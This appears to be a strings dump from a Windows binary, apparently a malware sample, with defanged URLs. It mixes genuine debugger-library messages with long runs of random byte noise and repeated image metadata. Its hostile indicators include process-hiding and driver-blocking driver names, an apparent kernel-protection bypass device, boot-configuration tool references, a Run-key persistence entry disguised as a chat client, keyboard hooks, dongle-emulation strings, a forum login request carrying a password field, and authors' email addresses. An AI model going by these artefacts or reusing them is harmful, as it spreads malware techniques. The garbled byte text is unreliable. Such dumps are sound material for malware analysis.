Dbh-%s out: status %X, PC %8X, SP %8X, FP %8X, RA %8X
Dbh-%s out: status %X, PC %I64X, SP %I64X, FP %I64X, RA %I64X
DIA search %x (%x) %s loc %x regs %x callee params %x
GetUserExceptionDispatcherContext(%X) = %X
taking smaller analysis prologue push count, %d < %d
RecoverFrame: func %X, bytes %X, prologue %x
unable to read code at %X
unknown code sequence X at %X
unknown out-prologue code X at %X
esp changed to %d (%s)
moved ebp to stack at %d
moved esp %X to ebp
push reg, num prologue %d
pop reg, num prologue %d
ebps %d:%d, ebpf %d, ebpesp %d
Applying SWU for eip %X esp %X ebp %X args %X
Result eip %X esp %X ebp %X args %X
Apply failed, x
ignoring invalid managed indirect call %X at %X
ignoring cross-image indirect call %X at %X
SearchForReturnAddress: stack %X, EBP %X func %X:%X, guess %d:%X
accepted zero return addr at %X
BOP, use %X
unreadable call site, use %X
swu found call %X for stack %X
dircall from %X to %X at %X
found function, use %X
found funclet call, use %X
found hot-patch function, use %X
direct call reaches %X, use %X
exact function, use %X
quick accept call to unreadable ind jmp, use %X
found unknown jmp/call, use %X
indcall from %X to %X at %X
exact ind call, use %X
found ind hot-patch function, use %X
ind call reaches %X, use %X
quick accept ind call, use %X
found ind call, use %X
choose guessed direct call through EBP, use %X
choose indirect call through EBP, use %X
found unk slot 0 call, use %X
choose guessed direct call, use %X
found call to unreadable ind jmp, use %X
found unknown jmp/call in guess region, use %X
found call to invalid ind jmp, use %X
no potential return addresses found, use %X
validated raw known ebp %X at %X
validated raw ebp %X at %X
raw ebp at %X does not appear to be valid
SearchForFramePointer: regs %X, ret esp %X, non-fpo %X, numregs %d
moved ebp to stack at %X
Unwinding trap frame for eip %X esp %X ebp %X
Unwinding TSS frame for eip %X
KiUserCallbackDispatcher(%X, %X) at %X, ret eip %X
Applying frame data program for eip %X esp %X ebp %X
Result eip %X esp %X ebp %X
Apply failed, 0xx
Unwind%s: eip %X, esp %X, ebp %X, func %X, first %d, FPO [%d,%d,%d]
UnwindUnknown: eip %X, esp %X, ebp %X, first %d
! Ignoring invalid ebp %X (%X), using esp %X
Unknown code, restore ebp from %X (%X)
! Unable to read ebp from %X, using %X
! Ignoring ebp %X
Prol: RIP %I64X, 0x%X bytes in function at %I64X
Unwind info has 0x%X codes
X: Code %X Info %x CodeOffs X, RSP %I64X
Prol: Invalid unwind op %X at index %X
AMD64_UWOP_PUSH_NONVOL Register %x RSP %I64X
Prol: Op %X memory read failed at %I64X
AMD64_UWOP_ALLOC_LARGE FrameOffs %x %x RSP %I64X   %x
AMD64_UWOP_ALLOC_LARGE FrameOffs %x RSP %I64X   %x
AMD64_UWOP_ALLOC_SMALL Info %x RSP %I64X
AMD64_UWOP_SET_FPREG FrameReg %x FrameOffs %x RSP %I64X
AMD64_UWOP_SAVE_NONVOL Register %x FrameBase %I64X FrameOffs %x RSP %I64X
AMD64_UWOP_SAVE_NONVOL_FAR Register %x FrameBase %I64X FrameOffs %x %x RSP %I64X
AMD64_UWOP_EPILOG OpInfo: %x
AMD64_UWOP_SPARE OpInfo: %x FrameOffs %x
AMD64_UWOP_SAVE_XMM128 Register %x FrameBase %I64X FrameOffs %x RSP %I64X
AMD64_UWOP_SAVE_XMM128_FAR Register %x FrameBase %I64X FrameOffs %x %x RSP %I64X
AMD64_UWOP_PUSH_MACHFRAME Info %x RetAddr %I64X StkAddr %I64X RSP %I64X
Prol: Op %X memory read 1 failed at %I64X
Prol: Op %X memory read 2 failed at %I64X
Prol: Unwind failed, 0xX
m_CallPointer = X, PC = X, SP = X, FuncStart = X, HaveRfe = %d
m_CallPointer = %x, PC = %x, SP = %x, FuncStart = %x, module base = %x
PC is leaf function, LR is %x
.xdata unwind record is x, InfoSize %u, Ret %x
Return m_CallPointer = %x, PC = %x, SP = %x, LR = %x
Body region desc B1: copy=%d, label_num=%d
Epilog desc B2: ecount=%d, LEB128(slot)=%d
Epilog desc B3: ecount=%d, LEB128 val=%d
Body region desc B4: copy=%d, label_num=%d
Undefined Label %d
Can't get unwind info at %I64x:%x, 0xx
Region R1 format: body=%x, length=%d
Region R2: body=0, length=%d
Region R3: body=%x, length=%d
MiscMask = 0x%x
Restored %s to %I64x
FrMask = 0x%x
GrMask = 0x%x
Prolog P7: type=%d slot= %d
Prolog P8: type=%d slot= %d
Format P9 not supported yet!
Region R2: rmask=%x,grsave=%d,length=%d
Prolog P1: brmask=%x
Prolog P2: brmask=%x reg base=%d
Prolog P3: type=%d reg=%d
Prolog P5: grmask = %x, frmask = %x
Prolog P6: is_gr = %d, mask = %x
Prolog P7: type=%d spoff = %d
Prolog P7: type=%d pspoff= %d
Prolog P7: type=%d Slot=%d FrameSize=%d
Prolog P7: type=%d, spillbase=%d
Unsupported Unwind Descriptor!
Prolog P8: type=%d spoff= %d
Prolog P8: type=%d pspoff= %d
Can't find runtime function entry info for x`x, results might be unreliable!
Func %X start %X size %X
Leaf %X LR %X
operator
dbghelp.pdb
tÙM
3333333
fD;.sE
tÙ@
Pt%D;
Eú#
xÿf
t.fD9s
%UUUU 
dbghelp.dll
FindExecutableImage
FindExecutableImageEx
FindExecutableImageExW
ReportSymbolLoadSummary
SymFindExecutableImage
SymFindExecutableImageW
SymSrvGetFileIndexes
SymSrvGetFileIndexesW
RegQueryInfoKeyW
RegEnumKeyExW
<requestedExecutionLevel
name="Microsoft.Windows.DebuggersAndTools"
version="1.0.0.0"
<description>Windows Debuggers and Tools</description>
<!-- Windows 6.3 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 6.2 (Win 8) -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 6.1 (Win 7) -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 6.0 (Vista) -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
`.vmp1
#.pYS
! .mrIkO
LX%U{
P.JAp
J8.Sf
wt<E.lG)WY
L.dDV
jK.BXQ
}s.Csk
n%F;7
(5%SL
EYW?%u
^.CgH
Q.cd{
.Kax~\K
`%d)k`@
`"SK.FB
=M4%x
.aDOe>
$f%F-
%u:2v77
/cRtn
M5v_.YH
f:\programming\my\sell\2016-03-19\sys\objfre_wxp_x86\i386\lonerSpeed_v40.pdb
<ntoskrnl.exe
kEYr
r_L.Ht
{w.Gl
U:\r2
s0r.Ar
keybq
B f.PH
.QfwD
5$w.fU
@%C(cH}
=-5Q}`
8u.ShpxW
f:\programming\my\sell\2015-10-19\sys\objfre_wxp_x86\i386\lonerSpeed_v40.pdb
yxbsq@foxmail.com
VVV.yxbsq.com
c:\users\hwl\desktop\20160430\bin\i386\DenyLoadDriver.pdb
n'Y?.Yq
Y..QfW
nz.KH
.efAd
>m.cOs
.Ju_ya$-)
ZI%XNX
.yPMV
/8%\{##?
H,.dOu
P%f$P*
F=.cS
eGp.bg
\GA%xy
<%StV
J`.wa
:.ubh
2u.vv
86%D&Z
}E%FlR
]r.xS
%fiX`3
u.KQ@Cz}
SQLb
%sf|@Y~
9-B.GdT
.xJ"*
[-6}h
uOu.LDC
C.lCG
s%C<"
,l%C Q
DD.fa
.mG?"
3p.dJ
8%XorfM
q.Px/
j.zSQ<
.hAYE
a%CrA
sM=%X
.PrO)=gzY
A$@.LM
_A.bs
}.PwO?n
g9.ER
%UU$(8
-`x.Dx@
p3%CUYQ
n.QrR{
vs.qT
.jo.V
%UWA8D
$.VW{
c%DL`
.KZ7r:
1)Ì
Y4@uDp
7%Sdj
%f{ s|f,
.TBYN^
|'%c/<;
DOb}%F
 $*y/2t.xb
^B2.jL
.HSuc
rl%FgQ
'HDPlug.DLL'
HD.HDSoft = s 'HDPlugInterFace Class'
CLSID = s '{7EEE458C-7C90-4871-B3EE-0F2AD7EDAE18}'
CurVer = s 'HD.HDSoft'
ForceRemove {7EEE458C-7C90-4871-B3EE-0F2AD7EDAE18} = s 'HDPlugInterFace Class'
ProgID = s 'HD.HDSoft'
stdole2.tlbWWW
BkeypadWW
.aKeyDownW
MKeyUpWWWd
KeyPressd
KeyPressStrW
pOkey_strWd
KeyPressChard
qHKeyDownCharWd
KeyUpCharWWWd
.retstrWWd
iRSetKeypadDelayWWd
>SGetWindowStateWWd
SetWindowStateWWd
U@SetWindowSizeWWWd
SetShowErrorMsgW
EnableRealKeypadd
WaitKeyW
KLoginWWW
password
keyWd
xModifyPasswordWW
oldPasswordW
NewPasswordWd
port
.yclientNumWWW
Created by MIDL version 7.00.0555 at Mon Jul 04 17:45:17 2016
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
gdiplus.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
RegOpenKeyW
HDPlug.DLL
Login
ModifyPassword
HideProcess.sys
: Running on Windows 2003
: Running on Windows XP
: Running on Windows 2000
: Running on Windows Vista
cdkey\sys\i386\Protect.pdb
\Dult.sys
netsh.exe
.rb)6t$`6
wI.VAj
.CR7C- G
!"#$%&'()* ,-./
|.DLL@&
C:\Ks\BLACK\8
.pdbk
E_Loader.dll
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
SkinH_EL.dll
F%u3H
2991425581
Adobe Photoshop CS3 Windows
2009:08:19 14:57:14
(7),01444
'9=82<.342
*.fI%
-%U:.
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:exif="hXXp://ns.adobe.com/exif/1.0/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/" xmlns:xap="hXXp://ns.adobe.com/xap/1.0/" xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" exif:PixelXDimension="1024" exif:PixelYDimension="768" exif:ColorSpace="1" exif:NativeDigest="36864,40960,40961,37121,37122,40962,40963,37510,40964,36867,36868,33434,33437,34850,34852,34855,34856,37377,37378,37379,37380,37381,37382,37383,37384,37385,37386,37396,41483,41484,41486,41487,41488,41492,41493,41495,41728,41729,41730,41985,41986,41987,41988,41989,41990,41991,41992,41993,41994,41995,41996,42016,0,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,22,23,24,25,26,27,28,30;45FED0AF54E1433340F00752D6A3D635" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" photoshop:History="" tiff:Orientation="1" tiff:XResolution="3000000/10000" tiff:YResolution="3000000/10000" tiff:ResolutionUnit="2" tiff:NativeDigest="256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;62F64FD90F0739B59885FB768EE20B8B" xap:CreateDate="2009-08-19T14:57:14 08:00" xap:ModifyDate="2009-08-19T14:57:14 08:00" xap:MetadataDate="2009-08-19T14:57:14 08:00" xap:CreatorTool="Adobe Photoshop CS3 Windows" xapMM:InstanceID="uuid:885F00228D8CDE118EB7A346E2032144" xapMM:DocumentID="uuid:875F00228D8CDE118EB7A346E2032144" dc:format="image/jpeg">
<xapMM:DerivedFrom stRef:instanceID="uuid:197875df-872b-11de-ba98-bd54df554615" stRef:documentID="uuid:73DB04B79785DE11B7389DA10F272B01"/>
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
=.mKP
v8%U7
Msg|s
.hRIjRd
%Si)Y
OM.MCJ
,.Rd_
.ymyB
xa.tvp
EE&x%S
.LD*vk
mz.cT
>S.tGuy
.kkeu
2%.xE
b).de^c
$poQ%Uy
~.kz%
.Wi?_
hXXp://VVV.yxbsq.com/list.asp?classid=29
.comment {color:green}
Copyright 2013-2016 VVV.yxbsq.com
keye
eJ.nM'iZJ1p
>w.yA)
qku'%.UkF
.XZqw|
S/y.aV
.rJjJ2
.WNsq
M.OkJ
q.tYO
s7.Yk4
e7%SIM(
F.RrW
VurL[
y-%sm:{
.Ee.NK
kz%x$
eV.PvJ1
b%FoZJms
.GzmJ
.[;=%d
&'.XN_
5.mRJ2
s$.Lr2<L
.EwxB)
{o.KI.
#:6%f
pz?F%F
.jUQJ
;GE.YM
N2u%x
*.VwK
#J.jt
9%sXj.R
7.hA;A
%7u G
I  .yZK
.h.We
WRiJ5!%d
E.YF7
F.MrM
nj.wJ
qf.Hi
OGy.IBW
?u.ni
ZM9.Bm
IVtT!.gh
$%F~|
!u.jr
8M{U.YE
$.Fwn |
.Ni^IJrK
i.nzr
%ut]7
.Vm)7
wR.IAJ
%UF-(S
.U.ys
.jRNO
I%uwh(
Sn i%Dm
999%d
.JRuc
.kZJJJ2iFn
.VpN\
E.kZnRG
wR.jOI%iy
.SI%(
.Uui.(b
{N./K.eU
 vn.ZJ
%9s^6
%u%gOY5}
iI^.su
N.Gm:R
.mZmZRrO
n.IE;
=\%9U
(J.MI~
\[N.RT
Ko8#D%x]
y.nm5
).nuj2
I.gnw Z
8%u.^Y>Uy
)J.RR
i.NWg
.Yi=b
.nmp~!x
M.USI:q
^.NQQ
\.fEba
VF%S{
.jPpJ
u.kY;~
sN.POM'
.ZghZf
.ysBM
M9%%x
R.MNQ
.INJR
.i'.iTQ^
J1I8.iAs%9j
%.eJ/
7.WNI
.Zn1N
yAI.YS^
.Unu8
!%xs8
.iJFN
.nkM-d
F.ryb
#V.QM
9#.ks
.ZqqMIF
%RIOG.eR
(.guh
9.Ra"0d
.XB->X
.rJQnQ
~(J.RW;
QIY'k.um\
/-%U^s
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
EnumChildWindows
comdlg32.dll
WINSPOOL.DRV
WINMM.dll
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
exui.dll
exui_yuansukeyouziji_kuozhanjiekou
RegOpenKeyA
OLEPRO32.DLL
ATL.DLL
CreateDialogIndirectParamA
oledlg.dll
dult.fne
dult_DICkey
dult_Usbkey
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
MSWHEEL_ROLLMSG
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
(*.htm;*.html)|*.htm;*.html
its:%s::%s
VVV.dywt.com.cn
index.dat
desktop.ini
TermType%d
Service%d
Machine%d
Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
\e161255a-37c3-11d2-bcaa-00c04fd929db
\Data\e161255a-37c3-11d2-bcaa-00c04fd929db
Software\Microsoft\Internet Explorer\TypedURLs
%d%d%d
rundll32.exe shell32.dll,
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
eapi.fne
(link.ini)
extra_args=/NODEFAULTLIB:"LIBC.LIB"
extra_args=/NODEFAULTLIB:"EAPI_STATIC.LIB"
extra_args=/NODEFAULTLIB:"mysql_static.lib"
2:33544711
VVV.exui.cc
bbs.exui.cc =====
ryxzxzw@163.com
2014. 08.30.1
\lib\ex_ui\AttributeEditorexui.dll
.pi]\L}L
/.rE*L)k
ex_ui keye
msimg32.dll
.pK>NG`
P>f%S9e
.qn{\
.mkBT
.qc]b
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:DDD122E7A584E2118FF1FE0FC3DAB2B7" xmpMM:DocumentID="xmp.did:A0B65855870011E2AFB69C04A7201614" xmpMM:InstanceID="xmp.iid:A0B65854870011E2AFB69C04A7201614" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22F24EC22D86E211815A8FDDD6268239" stRef:documentID="xmp.did:DDD122E7A584E2118FF1FE0FC3DAB2B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
11/15/11
VVV.meitu.com
[m.tT
4@{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C81E1B0B7A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C81E1B0A7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>w
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C81E1B0F7A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C81E1B0E7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C86695B87A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C86695B77A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>p
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C86695BC7A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C86695BB7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C86695C07A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C86695BF7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C8A76F497A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C8A76F487A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>]
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
N.trB&#
.cqn$
lib\ex_ui\AttributeEditorexui.dll
Ole32.dll
GdiPlus.dll
imm32.dll
program internal error number is %d.
%s%x.tmp
:"%s"
:"%s".
.?AVCCmdTarget@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
<tr><td bgcolor=buttonface>Y</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>X</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Height</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Width</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>RECT</td><td bgcolor=white>(%d, %d)-(%d, %d)</td></tr>
<tr><td bgcolor=buttonface>Styles</td><td bgcolor=white>0xX</td></tr>
<tr><td bgcolor=buttonface>Control ID</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Handle</td><td bgcolor=white>0xX</td></tr>
<table><tr><td><icon handle=0x%X></td><td>%s</td></tr></table>
burlywood
\winhlp32.exe
?e.exe
ai8vplaydl.dllSystem32\
.sxdata
SETUPAPI.dll
HID.DLL
Ry4S.dll
Rockey
ReadReport %d
WriteReport %d
SETPASSWORD 2,handle %4x
SETPASSWORD 1,handle %4x buffer:%s
Rockey4Smart
;(>,>0>4>8><>
9":(:,:0:4:
8*9094989<9
hXXp://bbs.dult.cn/
VVV.dult.cn
bbs.dult.cn
\my.sys
Usbkey
DICkey
software\microsoft\windows\CurrentVersion\Run\QQ
explorer.exe
hXXp://bbs.dult.cn/thread-10567-1-1.html
Getcpuid
<4,$?7/'
(3-!0,1'8"5.*2$
\COOKIE.ini
hXXp://bbs.dult.cn/
/member.php?mod=logging&action=login&loginsubmit=yes&handlekey=login&loginhash=LcOKW&inajax=1
&password=
home.php?mod=spacecp&ac=profile&op=verify
hXXp://bbs.dult.cn
hXXp://ec.dult.cn (
hXXp://bbs.dult.cn/thread-5456-1-1.html
hXXp://bbs.dult.cn/home.php?mod=spacecp&ac=credit&op=buy
258013246!
HTTP://
application/x-www-form-urlencoded
hXXp://forum.4bpa.com/forum.php
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Opera/9.80 (Windows NT 5.0; U; zh-cn) Presto/2.9.168 Version/11.50
thread-10002-1-1.html
forum.php?mod=misc&action=attachcredit&aid=7078&formhash=
D@VBScript.RegExp
ai8vplaydl.dll
.PAVCUserException@@
.PAVCOleException@@
.PAVCResourceException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
user.asp
Host: qxw1001940641.my3w.com
aaa.exe
bcdedit.exe
winload.exe
winload.efi
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\passkpp
\Device\passkpp
1.0.0.0
ntoskrnl!KeDelayExecutionThread
%s is followed by %s.
Any HTTP store must be the last store in the list.
%s: not available
You must agree to the Terms of Use to access the microsoft.com symbol site
%s - filename cannot exceed 100 characters
http:
https:
store %s - %s
winhttp
error 0x%x
file.ptr
%s - file not found
Error:This Network path is an invalid UNC path: '%s'
Error:This Network path is not supported UNC path: '%s'
Error: Ping the '%s' host failed
LZCopy() not found in module LZ32.DLL
LZClose() not found in module LZ32.DLL
LZOpenFileA() not found in module LZ32.DLL
LZInit() not found in module LZ32.DLL
InternetConnectW() not found in module WININET.DLL
InternetOpenW() not found in module WININET.DLL
HttpOpenRequestW() not found in module WININET.DLL
InternetCloseHandle() not found in module WININET.DLL
InternetReadFile() not found in module WININET.DLL
HttpQueryInfoW() not found in module WININET.DLL
HttpSendRequestW() not found in module WININET.DLL
InternetErrorDlg() not found in module WININET.DLL
InternetQueryDataAvailable() not found in module WININET.DLL
InternetQueryOptionW() not found in module WININET.DLL
WinHttpOpen() not found in module WINHTTP.DLL
WinHttpCloseHandle() not found in module WINHTTP.DLL
WinHttpReadData() not found in module WINHTTP.DLL
WinHttpSendRequest() not found in module WINHTTP.DLL
WinHttpQueryOption() not found in module WINHTTP.DLL
wvsprintfW() not found in module USER32.DLL
GetDeskTopWindow() not found in module USER32.DLL
SetWindowPos() not found in module USER32.DLL
ReleaseDC() not found in module USER32.DLL
GetDC() not found in module USER32.DLL
GetWindowRect() not found in module USER32.DLL
PostMessageA() not found in module USER32.DLL
GetDlgItem() not found in module USER32.DLL
SetDlgItemTextA() not found in module USER32.DLL
DialogBoxParamW() not found in module USER32.DLL
wsprintfW() not found in module USER32.DLL
GetDeviceCaps() not found in module GDI32.DLL
SymSrvTimeoutTimer_%s
%s re-enabled
%s from %s: %ld bytes -
SYMSRV: The file.ptr file message is: %s
%s disabled for %d minutes because of %d timeouts in %d minutes
Can't create %s
